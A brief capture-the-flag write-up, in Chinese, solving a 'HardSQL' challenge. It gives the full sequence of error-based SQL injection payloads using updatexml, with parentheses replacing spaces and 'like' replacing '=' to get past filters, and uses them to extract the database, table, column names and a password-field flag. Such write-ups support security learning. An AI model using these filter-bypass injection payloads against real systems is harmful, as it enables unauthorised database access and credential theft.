HardSQL
- 進入後是sql注入頁面,過濾了一些字符,先進行fuzz測試。
- 發現過濾了union,雙寫也無法繞過,所以不能使用常規的方法進行注入。但發現沒有過濾extractvalue和updatexml。
- 也過濾了空格,使用括號繞過。
- 首先,注數據庫名稱
username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1
- 然後得到表名(過濾
=
,使用like)
username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1
表名:H4rDsq1
- 得到H4rDsq1的字段名。
username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(H4rDsq1)),0x7e),1))%23&password=1
得到字段名:id,username,password;
- 獲取用戶名和密碼
username=admin'or(updatexml(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e),1))%23&password=1
只出現了一部分flag。
- 使用left()和right()左右進行拼接
username=admin’or(updatexml(1,concat(0x7e,(select(left(password,25))from(H4rDsq1)),0x7e),1))%23&password=1
username=admin’or(updatexml(1,concat(0x7e,(select(right(password,25))from(H4rDsq1)),0x7e),1))%23&password=1
得到flag:
flag{b281390b-acf4-4c74-8450-6ae768d24655}